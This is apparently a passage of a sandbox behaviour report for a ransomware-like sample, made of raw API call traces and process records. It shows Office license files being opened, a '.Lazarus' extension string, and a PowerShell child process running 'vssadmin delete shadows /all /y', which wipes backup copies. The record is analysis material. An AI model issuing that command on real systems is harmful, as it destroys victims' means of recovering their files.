lpMultiByteStr="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 86 [0247.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0247.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.639] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0247.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40f68 [0247.639] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x40eb8 [0247.640] AreFileApisANSI () returned 1 [0247.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0247.640] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81078 [0247.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x81078, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms") returned 86 [0247.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x250 [0247.645] GetFileType (hFile=0x250) returned 0x1 [0247.646] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81078 | out: hHeap=0x20000) returned 1 [0247.646] SetFilePointerEx (in: hFile=0x250, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0247.647] SetFilePointerEx (in: hFile=0x250, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0247.648] SetFilePointerEx (in: hFile=0x250, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0247.648] CloseHandle (hObject=0x250) returned 1 [0247.649] AreFileApisANSI () returned 1 [0247.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0247.649] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x814c8 [0247.649] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x814c8, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms") returned 86 [0247.649] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x250 [0247.650] GetFileType (hFile=0x250) returned 0x1 [0247.650] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x814c8 | out: hHeap=0x20000) returned 1 [0247.650] CloseHandle (hObject=0x250) returned 1 [0247.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0247.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0247.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0247.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0247.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0247.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0247.651] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0247.651] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de00 [0247.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0247.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0247.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0247.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0247.652] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de00 | out: hHeap=0x20000) returned 1 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0247.652] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0247.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0247.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0247.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d160 [0247.653] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d160 | out: hHeap=0x20000) returned 1 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0247.653] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0247.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0247.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0247.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0247.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0247.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0247.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0247.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0247.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0247.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0247.654] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0247.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0247.654] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0247.655] AreFileApisANSI () returned 1 [0247.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0247.655] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81a88 [0247.655] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71b68, cbMultiByte=-1, lpWideCharStr=0x81a88, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms") returned 86 [0247.655] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\HomeBusinessR_Retail2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\homebusinessr_retail2-ul-oob.xrm-ms"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe3fdcd93, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe3fdcd93, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe4180773, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d5d)) returned 1 [0247.655] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81a88 | out: hHeap=0x20000) returned 1 [0247.655] AreFileApisANSI () returned 1 [0247.656] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0247.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0247.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0247.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0247.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0247.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0247.656] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0247.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0247.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0247.656] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0247.656] GetLastError () returned 0x0 Process: id = "2" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6b564000" os_pid = "0x13d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13c4" cmd_line = "\\??\\C:\\WINDOWS\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\WINDOWS" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 2 os_tid = 0x13d8 Thread: id = 3 os_tid = 0x13f8 Thread: id = 4 os_tid = 0x10cc Thread: id = 5 os_tid = 0x1100 Thread: id = 6 os_tid = 0x110c Process: id = "3" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x4ef15000" os_pid = "0x5b0" os_integrity_level = "0x4000" os_privileges = "0x260814080" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k appmodel" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EntAppSvc" [0xa], "NT SERVICE\\StateRepository" [0xe], "NT SERVICE\\tiledatamodelsvc" [0xa], "NT SERVICE\\WalletService" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000f253" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 14 os_tid = 0x988 Thread: id = 15 os_tid = 0x820 Thread: id = 16 os_tid = 0x734 Thread: id = 17 os_tid = 0x6e8 Thread: id = 18 os_tid = 0x76c Thread: id = 19 os_tid = 0x690 Thread: id = 20 os_tid = 0x680 Thread: id = 21 os_tid = 0x614 Thread: id = 22 os_tid = 0x610 Thread: id = 23 os_tid = 0x60c Thread: id = 24 os_tid = 0x5b4 Process: id = "4" image_name = "powershell.exe" filename = "c:\\windows\\syswow64\\windowspowershell\\v1.0\\powershell.exe" page_root = "0xbb47000" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x13c4" cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" vssadmin delete shadows /all /y" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 25 os_tid = 0xd04 [0059.365] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0059.371] RoInitialize () returned 0x1 [0059.371] RoUninitialize () returned 0x0 [0059.712] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0059.768] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0066.763] SysStringByteLen (bstr="vssadmin") returned 0x10 [0066.763] SysStringByteLen (bstr="vssadmin") returned 0x10 [0066.763] SysStringByteLen (bstr="delete") returned 0xc [0066.763] SysStringByteLen (bstr="delete") returned 0xc [0066.763] SysStringByteLen (bstr="shadows") returned 0xe [0066.763] SysStringByteLen (bstr="shadows") returned 0xe [0066.764] SysStringByteLen (bstr="/all") returned 0x8 [0066.764] SysStringByteLen (bstr="/all") returned 0x8 [0066.764] SysStringByteLen (bstr="/y") returned 0x4 [0066.764] SysStringByteLen (bstr="/y") returned 0x4 [0070.914] WindowsCreateStringReference () returned 0x0 [0070.914] RoGetActivationFactory () returned 0x0 [0071.124] QueryInterface () returned 0x0 [0071.124] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0071.124] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0071.125] QueryInterface () returned 0x0 [0071.125] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::GetRuntimeClassName () returned 0x8000000e [0071.125] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0071.125] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::AddRef () returned 0x4 [0071.125] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0071.125] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0071.125] Release () returned 0x4 [0071.125] CoGetContextToken (in: pToken=0x74d6e0 | out: pToken=0x74d6e0) returned 0x0 [0071.125] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x80004002 [0071.126] CoGetContextToken (in: pToken=0x74d9f0 | out: pToken=0x74d9f0) returned 0x0 [0071.126] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0071.126] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x4 [0071.126] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::Release () returned 0x3 [0071.126] WindowsDeleteString () returned 0x0 [0071.126] Release () returned 0x2 [0071.126] CoGetContextToken (in: pToken=0x74e168 | out: pToken=0x74e168) returned 0x0 [0071.127] CoGetContextToken (in: pToken=0x74e0c8 | out: pToken=0x74e0c8) returned 0x0 [0071.127] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::QueryInterface () returned 0x0 [0071.127] AddRef () returned 0x4 [0071.128] Release () returned 0x3 [0071.156] IIDFromString (in: lpsz="{410B7711-FF3B-477F-9C9A-D2EFDA302DC3}", lpiid=0x74d800 | out: lpiid=0x74d800) returned 0x0 [0071.157] Windows::Foundation::Diagnostics::AsyncCausalityTracerFactory::add_TracingStatusChanged () returned 0x0 [0073.495] GenericStreamBase::Write () returned 0x0 [0073.495] GenericStreamBase::Write () returned 0x0 [0073.496] CoCreateGuid (in: pguid=0x733547a8 | out: pguid=0x733547a8*(Data1=0xc56dbcbc, Data2=0xc0a7, Data3=0x404b, Data4=([0]=0xa5, [1]=0xab, [2]=0x40, [3]=0xdd, [4]=0xb8, [5]=0x38, [6]=0xda, [7]=0x26))) returned 0x0 [0073.496] GenericStreamBase::Write () returned 0x0 [0073.643] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0073.643] CExtensionCatalog::AddRef () returned 0x3 [0073.643] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0073.643] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x0 [0073.644] Release () returned 0x3 [0073.644] CoGetContextToken (in: pToken=0x74d5b8 | out: pToken=0x74d5b8) returned 0x0 [0073.644] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::QueryInterface () returned 0x80004002 [0074.026] WindowsCreateString () returned 0x0 [0074.026] CExtensionCatalog::AddRef () returned 0x4 [0074.026] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::Release () returned 0x3 [0074.027] Windows::Foundation::Diagnostics::TracingStatusChangedEventArgs::get_Enabled () returned 0x0 [0074.049] EtwEventRegister (in: ProviderId=0x4845b94, EnableCallback=0x4772bc6, CallbackContext=0x0, RegHandle=0x4845b70 | out: RegHandle=0x4845b70) returned 0x0 [0074.053] EtwEventRegister (in: ProviderId=0x4846298, EnableCallback=0x4772bee, CallbackContext=0x0, RegHandle=0x4846274 | out: RegHandle=0x4846274) returned 0x0 [0074.053] EtwEventSetInformation (RegHandle=0xb08458, InformationClass=0x2d, EventInformation=0x2, InformationLength=0x4846238) returned 0x0 [0074.581] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x74eaf4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x74eaf4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0074.591] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x74eaf4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x74eaf4*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0xd, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0074.592] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x74eaa4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x74eaa4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0))) returned 0x0 [0074.612] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x74eb04*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0xd, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x74eb04*(Data1=0xfed11ca0, Data2=0xd815, Data3=0x0, Data4=([0]=0xd, [1]=0x30, [2]=0xd1, [3]=0xfe, [4]=0x15, [5]=0xd8, [6]=0xd5, [7]=0x1))) returned 0x0 [0074.629] EtwEventRegister (in: ProviderId=0x48466a8, EnableCallback=0x4772c16, CallbackContext=0x0, RegHandle=0x4846680 | out: RegHandle=0x4846680) returned 0x0 [0074.812] EtwEventWriteTransfer (RegHandle=0xb08968, EventDescriptor=0x2e, ActivityId=0x74eb18, RelatedActivityId=0x74eac4, UserDataCount=0x0, UserData=0x0) returned 0x0 [0075.466] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x104, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0075.466] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x88 [0075.466] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x88, lpBuffer=0xb7ad50, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87 [0075.466] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x74e9c8) returned 1 [0075.466] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x74ea44 | out: lpFileInformation=0x74ea44*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71ce8766, ftCreationTime.dwHighDateTime=0x1d32794, ftLastAccessTime.dwLowDateTime=0x71ce8766, ftLastAccessTime.dwHighDateTime=0x1d32794, ftLastWriteTime.dwLowDateTime=0x71d0e9d1, ftLastWriteTime.dwHighDateTime=0x1d32794, nFileSizeHigh=0x0, nFileSizeLow=0x623400)) returned 1 [0075.466] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x74e9c4) returned 1 [0075.470] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x74eab8 | out: lpdwHandle=0x74eab8) returned 0x94c [0076.036] GetFileVersionInfoW (in: lptstrFilename="C:\\WINDOWS\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x484ae4c | out: lpData=0x484ae4c) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x74ea8c, puLen=0x74ea88 | out: lplpBuffer=0x74ea8c*=0x484aee8, puLen=0x74ea88) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484afc4, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b018, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b074, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b0b4, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b11c, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b1b8, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b21c, puLen=0x74ea08) returned 1 [0076.056] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484b298, puLen=0x74ea08) returned 1 [0076.057] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x484af40, puLen=0x74ea08) returned 1 [0076.057] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x0, puLen=0x74ea08) returned 0 [0076.057] VerQueryValueW (in: pBlock=0x484ae4c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x74ea0c, puLen=0x74ea08 | out: lplpBuffer=0x74ea0c*=0x0, 